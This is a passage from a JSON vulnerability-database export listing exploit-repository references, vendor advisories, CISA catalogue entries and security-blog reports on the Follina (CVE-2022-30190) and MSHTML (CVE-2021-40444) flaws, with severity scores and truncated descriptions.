"E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:43:29", "description": "```console\n$ gollina -h\n\n gollina\n Follina MS-MSDT 0-day MS Of...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:02:00", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:01", "id": "FC455648-370A-582B-A03A-6299DDC272F6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:42:43", "description": "# CVE-2022-30190\n\n> On Monday May 30, 2022, Microsoft issued CVE...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:00:42", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:01", "id": "FFA2D3A3-AFD4-580B-8424-EE4844976B65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:50", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\n\nHost exploit.html...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:58:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T23:24:23", "id": "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:08:04", "description": "# mitigate-folina\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T09:30:13", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T12:18:29", "id": "005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:07", "description": "# CVE-2022-30190-mass\nCVE-2022-30190 Zero click rce Mass Exploit...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:19:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T09:39:02", "id": "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:00:31", "description": "# CVE-2022-30190\nMitigation for CVE-2022-30190\n\nScript requires ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T00:23:11", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-10T00:25:47", "id": "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:05:59", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-09T18:20:51", "id": "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:04:30", "description": "# Follina workaround (CVE-2022-30190)\n\n## Description\nThese two ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:20:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-08T14:29:37", "id": "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:58:01", "description": "# folli...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T09:13:05", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T09:15:12", "id": "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-27T13:48:35", "description": "# follina_cve_2022-30190\nA proof of concept to CVE-2022-30190 (f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T14:57:17", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T02:17:48", "id": "BAA0F684-952E-5B9E-B207-0419A33AC53B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:40:38", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T09:32:10", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:16", "id": "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-02T17:59:17", "description": "A remote code execution vulnerability exists in Microsoft Support Diagnostic Tool, also known as, \"Follina\". Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Support Diagnostic Tool Remote Code Execution (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T00:00:00", "id": "CPAI-2022-0283", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T23:25:24", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country&#x27;s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia&#x27;s largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn&#x27;t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", 